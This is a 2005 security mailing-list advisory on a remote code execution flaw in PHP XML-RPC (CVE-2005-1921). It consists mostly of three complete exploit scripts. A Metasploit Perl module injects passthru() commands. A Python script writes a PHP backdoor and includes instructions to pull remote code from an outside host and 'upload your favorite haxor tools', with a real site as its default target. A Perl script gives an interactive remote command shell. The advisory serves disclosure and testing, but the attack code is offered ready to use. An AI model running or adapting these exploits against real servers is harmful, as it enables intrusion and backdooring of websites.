[EXPL] XMLRPC Remote Commands Execution (Multiple Exploits)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/05
- Previous message: SecuriTeam: "[EXPL] PrivaShare DoS (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 27 Jul 2005 16:44:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
XMLRPC Remote Commands Execution (Multiple Exploits)
------------------------------------------------------------------------
SUMMARY
Lack of parameter filtering by the xmlrpc.php script allows a remote
attacker to cause the script to execute arbitrary code. The following
exploit codes can be used to test your system for the mentioned
vulnerability.
DETAILS
Exploit #1:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::php_xmlrpc_eval;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the XML-RPC script', '/xmlrpc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary code execution flaw discovered in many
implementations of the PHP XML-RPC module. This flaw is exploitable
through
a number of PHP web applications, including but not limited to Drupal,
Wordpress,
Postnuke, and TikiWiki.
}),
'Refs' =>
[
['BID', '14088'],
['CVE', '2005-1921'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['xmlrpc'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the XML-RPC post data
my $data =
'<?xml version="1.0"?>'.
"<methodCall><methodName>" .
Pex::Text::AlphaNumText(int(rand(128)+32))."</methodName>".
"<params><param><name>" .
Pex::Text::AlphaNumText(int(rand(128)+32))."');".
"echo('_cmd_beg_\n');".
"passthru($byte);".
"echo('_cmd_end_\n');".
";//</name><value>".
Pex::Text::AlphaNumText(int(rand(128)+32)).
"</value></param></params></methodCall>";
my $req =
"POST $path HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/xml\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n". $data . "\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious XML-RPC POST request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
my $out = $1;
$out =~ s/^\s+|\s+$//gs;
if ($out) {
$self->PrintLine('----------------------------------------');
$self->PrintLine('');
$self->PrintLine($out);
$self->PrintLine('');
$self->PrintLine('----------------------------------------');
}
}
return;
}
1;
#EoF
Exploit #2:
#!/usr/bin/python
# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not
working for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692 Remote Code Exection In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005
import sys, httplib
try:
chose = sys.argv[1]
except IndexError:
chose = 'chk'
try:
host = sys.argv[2]
except IndexError:
host = 'www.postnuke.com'
try:
uri = sys.argv[3]
except IndexError:
uri = '/xmlrpc.php'
def check():
SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall>
"""
webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke
k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)
# get the response
statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print 'If you see phpinfo dump data the you are succeful. proceed with
xpl!'
def xpl():
SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>',''));
echo 'start';
passthru('del xmlrpcpy.php');
$filename = 'xmlrpcpy.php';
$somecontent = '%?php include(~inc); ?#';
$somecontent = eregi_replace('%', chr(60), $somecontent);
$somecontent = eregi_replace('~', chr(36), $somecontent);
$somecontent = eregi_replace('#', chr(62), $somecontent);
$handle = fopen($filename,'w');
fwrite($handle, $somecontent);
fclose($handle);
passthru('dir');
passthru('type xmlrpcpy.php');
echo 'done';
exit;
/*</name></value>
</param>
</params>
</methodCall>
"""
webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke
k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)
# get the response
statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print '\n\nExploit Successful!!!\n' . 'Download
http://www.suneworld.com/programs/webexplorer20.zip'
print 'Rename index.php3 to index.txt and put it to some public host
http://somehost.com/index.txt'
print 'Now Accessed it like this: '
print 'http://victimhost/postnukewhatever/' .
'xmlrpcpy.php?inc=http://somehost.com/index.txt'
print 'Then upload your favorite haxor tools! Bye. Stay healthy!'
if __name__ == "__main__":
print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
print 'revised it if you can! ver jul 2005'
print 'Greetz: Albanian Security Clan!!!'
print '---------------------------------------------'
print './xmlrpc.py [chk|xpl] host uri'
print 'example (check bug): ./xmlrpc.py chk www.postnuke.com
/xmlrpc.php'
print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com
/xmlrpc.php'
if chose=='chk':
check()
elif chose=='xpl':
xpl();
else:
print 'Boom! Script Kiddie'
#EoF
Exploit #3:
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: !dSR digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print
# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;
# general
my $host;
#informational lines to feed my own ego.
print "xmlrpc exploit - http://www.reversing.org \n";
print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
print "special chars allowed are / and - \n\n";
# read command line options
my $options = GetOptions (
#general options
'host=s' => \$host, # input host to test.
# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);
# command line sanity check
&show_usage unless ($host);
# main loop
while (1){
print "\nxmlrpc@# ";
my $cmd = <STDIN>;
xmlrpc_xploit ($cmd);
}
exit (1);
#exploit
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;
my $d1 = "<?xml version=\"1.0\"?><methodCall>". "<methodName>".
"examples.getStateName</methodName>" . "<params><param><name>a');";
my $d2 = ";//</name><value>xml exploit
R/01</value></param></params></methodCall>";
$data =~ s/-/'.chr(45).'/mg;
$data =~ s/\//'.char(47).'/mg;
my $req = new HTTP::Request 'POST' => $host;
$req->content_type('application/xml');
$req->content($d1.'system(\''.$data.'\')'.$d2);
my $ua = new LWP::UserAgent;
$ua->agent("xmlrpc exploit R/0.1");
$ua->timeout($conn_timeout);
if ($basic_auth_user){
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
}
if ($proxy){
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
}
#send request, return null if not OK
my $res = $ua->request($req);
if ($res->is_success){
$reply= $res->content;
} else {
$reply = "";
}
$reply =~ /(.*).(<pre>warning.*)/mgsi;
print ($1);
}
# show options
sub show_usage {
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
print "main options\n";
print "connection options\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--basic_auth_user, --basic_auth_pass\n";
print "\t--timeout \n";
print "\nExample\n";
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
print "\n";
exit(1);
}
#Eof
ADDITIONAL INFORMATION
The information has been provided by <mailto:crg@digitalsec.net> Crg and
<mailto:hdm@metasploit.com> H D Moore.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] PrivaShare DoS (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
